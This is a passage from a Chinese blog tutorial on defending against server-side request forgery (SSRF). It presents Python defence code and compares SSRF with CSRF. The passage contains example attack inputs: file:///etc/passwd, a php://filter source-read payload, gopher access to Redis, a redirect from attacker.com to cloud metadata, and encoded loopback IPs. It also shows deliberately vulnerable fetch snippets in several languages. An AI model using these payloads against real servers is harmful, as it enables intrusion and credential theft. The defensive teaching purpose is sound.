<p><code>::1</code>、<code>fc00::/7</code>——IPv6 的回环和私有地址。</p>
<p><strong>八进制/十六进制 IP 绕过：</strong> 某些 URL 解析器接受非十进制格式的 IP。<code>0177.0.0.1</code>（八进制）= <code>127.0.0.1</code>，<code>0x7f000001</code>（十六进制）= <code>127.0.0.1</code>。防御代码必须先将 IP 标准化为数字格式再比对。</p>
<h4 id="3-3-协议白名单：只允许-HTTP-HTTPS"><a href="#3-3-协议白名单：只允许-HTTP-HTTPS" class="headerlink" title="3.3 协议白名单：只允许 HTTP/HTTPS"></a>3.3 协议白名单：只允许 HTTP/HTTPS</h4><p>禁止 <code>file://</code>、<code>gopher://</code>、<code>dict://</code>、<code>ldap://</code>、<code>ftp://</code> 等协议，只允许 <code>http://</code> 和 <code>https://</code>：</p>
<pre><code class="python">def safe_fetch(url):
    parsed = urlparse(url)
    if parsed.scheme not in (&#39;http&#39;, &#39;https&#39;):
        raise ValueError(f&quot;Protocol &#123;parsed.scheme&#125; not allowed&quot;)
    ...
</code></pre>
<p><strong>为什么这能防协议利用攻击？</strong> 因为 <code>file:///etc/passwd</code> 和 <code>gopher://192.168.1.100:6379/...</code> 都依赖非 HTTP 协议。只允许 HTTP/HTTPS 后，这些攻击路径全部被切断。</p>
<p><strong>注意事项：</strong> 某些 URL 解析器对协议的判断和服务端 HTTP 客户端不一致。例如 <code>http://attacker.com\@192.168.1.1</code>，URL 解析器认为域名是 <code>attacker.com</code>，但某些 HTTP 客户端实际请求的是 <code>192.168.1.1</code>。应该使用成熟的 URL 解析库，并在解析后重新构造 URL。</p>
<h4 id="3-4-请求方法限制和响应处理"><a href="#3-4-请求方法限制和响应处理" class="headerlink" title="3.4 请求方法限制和响应处理"></a>3.4 请求方法限制和响应处理</h4><p><strong>只允许 GET 请求：</strong> 很多 SSRF 利用需要 POST 或其他方法（如 gopher 协议向 Redis 发送命令）。限制为 GET 可以减少攻击面。</p>
<pre><code class="python"># 只允许 GET
response = requests.get(url, timeout=5, allow_redirects=False)
</code></pre>
<p><strong>禁止跟随重定向：</strong> HTTP 重定向的工作方式是：服务器返回 302 状态码和一个 <code>Location</code> 头，告诉客户端”你要找的内容在另一个地址”。浏览器和大部分 HTTP 客户端的默认行为是自动跟随重定向——收到 302 后自动向 <code>Location</code> 指定的新地址发起请求，用户感知不到这个过程。Python 的 <code>requests.get(url, allow_redirects=True)</code> 会跟随，Java 的 <code>HttpURLConnection</code> 默认跟随，Go 的 <code>http.Get</code> 默认跟随最多 10 次。</p>
<p>这个默认行为在 SSRF 场景下是一个严重的绕过路径。攻击者可以这样利用：</p>
<pre><code>攻击者提交: url=http://attacker.com/redirect
  → 防御层：DNS 解析 attacker.com → 1.2.3.4（公网 IP，合法）→ 放行
  → HTTP 客户端：GET http://attacker.com/redirect
  → attacker.com 响应：302 Location: http://169.254.169.254/latest/meta-data/
  → HTTP 客户端自动跟随：GET http://169.254.169.254/latest/meta-data/
  → 请求实际到达内网，防御层完全不知道
  → 攻击者拿到元数据
</code></pre>
<p>防御层只检查了用户最初提交的 URL（<code>attacker.com</code>，合法），但 HTTP 客户端自动跟随重定向后访问的目标（<code>169.254.169.254</code>）完全不在防御层的检查范围内。这和 DNS 重绑定解决的是同一类问题：<strong>防御逻辑必须覆盖请求链路中的每一个目标地址，不能只检查入口就放行整条链。</strong></p>
<p>“禁止跟随重定向”就是关掉 HTTP 客户端的自动重定向行为。收到 302 就停下来，把响应原样返回，不自动去访问 <code>Location</code> 指向的新地址。这样攻击者的重定向链就断了。</p>
<pre><code class="python"># 禁止自动跟随重定向
response = requests.get(url, allow_redirects=False)
</code></pre>
<p>如果业务确实需要支持重定向（比如 CDN 跳转、短链接展开），不能简单禁止，而是要在每次跳转时重新校验目标地址——解析新 URL 的 DNS、检查 IP 是否内网、确认协议是否合法，通过后再继续：</p>
<pre><code class="python">def safe_fetch_with_redirects(url, max_redirects=5):
    for _ in range(max_redirects):
        parsed = urlparse(url)
        ip = socket.gethostbyname(parsed.hostname)
        if is_internal_ip(ip):
            raise ValueError(&quot;Redirect to internal IP blocked&quot;)
        
        response = requests.get(url, allow_redirects=False)
        if response.status_code in (301, 302, 307, 308):
            url = response.headers.get(&#39;Location&#39;)
            if not url:
                break
            continue  # 对重定向目标重新执行校验
        return response
</code></pre>
<p><strong>限制响应大小和超时：</strong> 防止 SSRF 被用于 DoS（让服务端下载超大文件或等待长时间无响应）。</p>
<pre><code class="python">response = requests.get(url, timeout=5, stream=True)
# 限制响应大小
content = response.raw.read(1024 * 1024)  # 最多读 1MB
</code></pre>
<h4 id="3-5-统一防御方案"><a href="#3-5-统一防御方案" class="headerlink" title="3.5 统一防御方案"></a>3.5 统一防御方案</h4><p>将以上策略组合，形成一个完整的防御函数：</p>
<pre><code class="python">import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = (&#39;http&#39;, &#39;https&#39;)
BLOCKED_NETWORKS = [
    ipaddress.ip_network(&#39;10.0.0.0/8&#39;),
    ipaddress.ip_network(&#39;172.16.0.0/12&#39;),
    ipaddress.ip_network(&#39;192.168.0.0/16&#39;),
    ipaddress.ip_network(&#39;127.0.0.0/8&#39;),
    ipaddress.ip_network(&#39;169.254.0.0/16&#39;),
    ipaddress.ip_network(&#39;0.0.0.0/8&#39;),
    ipaddress.ip_network(&#39;::1/128&#39;),
    ipaddress.ip_network(&#39;fc00::/7&#39;),
]

def safe_fetch(url, max_size=1024*1024):
    # 1. 协议白名单
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f&quot;Protocol &#123;parsed.scheme&#125; not allowed&quot;)

    # 2. DNS 解析
    try:
        ip = socket.gethostbyname(parsed.hostname)
    except socket.gaierror:
        raise ValueError(&quot;Cannot resolve hostname&quot;)

    # 3. 内网 IP 过滤
    ip_obj = ipaddress.ip_address(ip)
    if any(ip_obj in net for net in BLOCKED_NETWORKS):
        raise ValueError(&quot;Internal IP not allowed&quot;)

    # 4. 用解析后的 IP 发起请求（防 DNS 重绑定）
    safe_url = url.replace(parsed.hostname, ip)
    response = requests.get(
        safe_url,
        timeout=5,
        allow_redirects=False,  # 禁止自动重定向
        stream=True
    )

    # 5. 限制响应大小
    content = response.raw.read(max_size)
    return content
</code></pre>
<p>如果业务需要跟随重定向，每次重定向都要重新校验目标 IP：</p>
<pre><code class="python">def safe_fetch_with_redirects(url, max_redirects=3):
    for _ in range(max_redirects):
        # 每次迭代都重新执行完整的校验流程
        parsed = urlparse(url)
        ip = socket.gethostbyname(parsed.hostname)
        if any(ipaddress.ip_address(ip) in net for net in BLOCKED_NETWORKS):
            raise ValueError(&quot;Redirect to internal IP blocked&quot;)

        response = requests.get(url, timeout=5, allow_redirects=False, stream=True)
        if response.status_code in (301, 302, 303, 307, 308):
            url = response.headers.get(&#39;Location&#39;)
            if not url:
                break
            continue
        # 非重定向响应，返回内容
        return response.raw.read(1024*1024)
    raise ValueError(&quot;Too many redirects&quot;)
</code></pre>
<hr>
<h3 id="四、SSRF-与-CSRF-的对比"><a href="#四、SSRF-与-CSRF-的对比" class="headerlink" title="四、SSRF 与 CSRF 的对比"></a>四、SSRF 与 CSRF 的对比</h3><p>SSRF 和 CSRF 名字相似，攻击方向完全不同。对比理解有助于记忆：</p>
<pre><code>              CSRF                          SSRF
攻击对象     用户（借用户的浏览器发请求）     服务端（借服务端的网络发请求）
攻击发生位置  客户端（浏览器）                服务端（后端应用）
利用的能力    浏览器自动携带 Cookie           服务端可以访问内网
攻击目标      以用户身份执行操作              访问内网服务/云元数据/本地文件
防御核心      SameSite Cookie / CSRF Token   URL 白名单 / 内网 IP 过滤
</code></pre>
<p>CSRF 中，攻击者需要诱导用户点击链接（用户是跳板）。SSRF 中，攻击者直接与服务端交互，不需要用户参与（服务端是跳板）。</p>
<p>CSRF 的防御是确保”请求确实是用户主动发出的”（Token、SameSite）。SSRF 的防御是确保”服务端请求的地址是安全的”（白名单、IP 过滤）。</p>
<p>两者的共同根源是：系统在处理外部输入时，没有校验请求的目标地址是否合法。CSRF 没有校验请求是否来自合法页面，SSRF 没有校验 URL 是否指向合法地址。</p>
<hr>
<h3 id="五、各语言-框架的-SSRF-风险点"><a href="#五、各语言-框架的-SSRF-风险点" class="headerlink" title="五、各语言/框架的 SSRF 风险点"></a>五、各语言/框架的 SSRF 风险点</h3><h4 id="5-1-Java"><a href="#5-1-Java" class="headerlink" title="5.1 Java"></a>5.1 Java</h4><p><code>java.net.URL</code> 和 <code>HttpURLConnection</code> 默认支持多种协议（<code>http</code>、<code>https</code>、<code>file</code>、<code>jar</code>、<code>ftp</code>）。如果直接用用户输入的 URL 构造 <code>URL</code> 对象并打开连接，<code>file:///etc/passwd</code> 会被读取。</p>
<pre><code class="java">// 危险：直接接受用户输入的 URL
URL url = new URL(userInput);
URLConnection conn = url.openConnection();
InputStream is = conn.getInputStream();
</code></pre>
<p>Spring 的 <code>RestTemplate</code> 和 <code>WebClient</code> 默认跟随重定向，需要在配置中禁用。</p>
<h4 id="5-2-Python"><a href="#5-2-Python" class="headerlink" title="5.2 Python"></a>5.2 Python</h4><p><code>requests.get(url)</code> 默认跟随重定向（最多 30 次），默认支持 <code>http</code> 和 <code>https</code>，但不支持 <code>file://</code>。但如果使用 <code>urllib</code>，<code>file://</code> 协议是可用的。</p>
<pre><code class="python"># 危险：urllib 支持 file://
import urllib.request
content = urllib.request.urlopen(user_input).read()
# user_input = &quot;file:///etc/passwd&quot; → 读取本地文件
</code></pre>
<p><code>curl</code> 命令行工具（如果通过 <code>subprocess</code> 调用）默认支持大量协议，包括 <code>dict://</code>、<code>gopher://</code>、<code>ftp://</code>。</p>
<h4 id="5-3-PHP"><a href="#5-3-PHP" class="headerlink" title="5.3 PHP"></a>5.3 PHP</h4><p><code>file_get_contents()</code> 默认支持多种协议包装器（<code>file://</code>、<code>http://</code>、<code>ftp://</code>、<code>php://</code>、<code>data://</code>、<code>glob://</code>）。</p>
<pre><code class="php">// 危险：file_get_contents 支持多种协议
$content = file_get_contents($userInput);
// $userInput = &quot;file:///etc/passwd&quot; → 读取本地文件
// $userInput = &quot;php://filter/convert.base64-encode/resource=config.php&quot; → 读取 PHP 源码
</code></pre>
<p><code>curl_exec()</code> 默认跟随重定向，且支持 <code>dict://</code>、<code>gopher://</code> 等协议（取决于编译选项）。</p>
<h4 id="5-4-Node-js"><a href="#5-4-Node-js" class="headerlink" title="5.4 Node.js"></a>5.4 Node.js</h4><p>Node.js 原生 <code>http</code> 模块只支持 HTTP 协议，但第三方库如 <code>node-fetch</code>、<code>axios</code> 默认跟随重定向。<code>got</code> 库支持多种协议。</p>
<pre><code class="javascript">// 危险：axios 默认跟随重定向
const axios = require(&#39;axios&#39;);
const response = await axios.get(userInput);
// userInput 指向攻击者服务器 → 302 重定向到 http://169.254.169.254/
</code></pre>
<hr>
<h3 id="六、防御优先级总结"><a href="#六、防御优先级总结" class="headerlink" title="六、防御优先级总结"></a>六、防御优先级总结</h3><p>按重要程度排列：</p>
<ol>
<li><strong>URL 白名单</strong>——只允许请求预定义的安全域名，默认拒绝一切</li>
<li><strong>内网 IP 过滤</strong>——DNS 解析后校验 IP，禁止请求私有地址和云元数据地址</li>
<li><strong>协议白名单</strong>——只允许 <code>http://</code> 和 <code>https://</code>，禁止 <code>file://</code>、<code>gopher://</code> 等</li>
<li><strong>禁止自动重定向</strong>——或每次重定向重新校验目标 IP</li>
<li><strong>防 DNS 重绑定</strong>——校验后用已解析的 IP 直接发起请求</li>
<li><strong>限制响应大小和超时</strong>——防止 DoS</li>
<li><strong>最小权限原则</strong>——服务端应用使用最低权限运行，减少被利用后的影响范围</li>
</ol>
<hr>
<h3 id="七、小结"><a href="#七、小结" class="headerlink" title="七、小结"></a>七、小结</h3><p>SSRF 的本质是攻击者借服务端的网络能力访问其本不该访问的地址。与 CSRF 形成对称——CSRF 借用户的浏览器发请求，SSRF 借服务端的网络发请求。</p>
<p>按攻击效果分四种：基础 SSRF 探测和访问内网服务，云元数据攻击窃取 IAM 凭证（云环境中最致命），协议利用通过 gopher/dict/file 精确攻击内网非 HTTP 服务，盲 SSRF 无回显但可通过副作用触发内部操作。</p>
<p>防御的核心是纵深防御。URL 白名单是最安全的策略，内网 IP 过滤是白名单不可用时的底线，协议白名单切断非 HTTP 协议的利用路径，禁止自动重定向和防 DNS 重绑定堵住校验后的绕过路径。组合使用才能有效防御。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">小竹</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://zhuyanzhen-lab.github.io/2026/08/08/2026-08-08-ssrf-attacks-principles-and-defense/">https://zhuyanzhen-lab.github.io/2026/08/08/2026-08-08-ssrf-attacks-principles-and-defense/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">小竹</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">安全</span>
                                </a>
                            
                                <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">Web安全</span>
                                </a>
                            
                                <a href="/tags/SSRF/">
                                    <span class="chip bg-color">SSRF</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2026/08/08/2026-08-08-command-injection-principles-and-defense/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/20.jpg" class="responsive-img" alt="命令注入（OS Command Injection）：原理、攻击与防御">
                        
                        <span class="card-title">命令注入（OS Command Injection）：原理、攻击与防御</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2026-08-08
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            小竹
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">安全</span>
                    </a>
                    
                    <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">Web安全</span>
                    </a>
                    
                    <a href="/tags/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/">
                        <span class="chip bg-color">命令注入</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2026/08/07/2026-08-07-http-request-response-security-landscape/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/8.jpg" class="responsive-img" alt="HTTP 请求响应全景：从协议结构看 Web 攻击的本质">
                        
                        <span class="card-title">HTTP 请求响应全景：从协议结构看 Web 攻击的本质</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-08-07
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            小竹
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">安全</span>
                    </a>
                    
                    <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">Web安全</span>
                    </a>
                    
                    <a href="/tags/HTTP/">
                        <span class="chip bg-color">HTTP</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2021-2026</span>
            
            <a href="/about" target="_blank">小竹</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/zhuyanzhen-lab" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>















</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
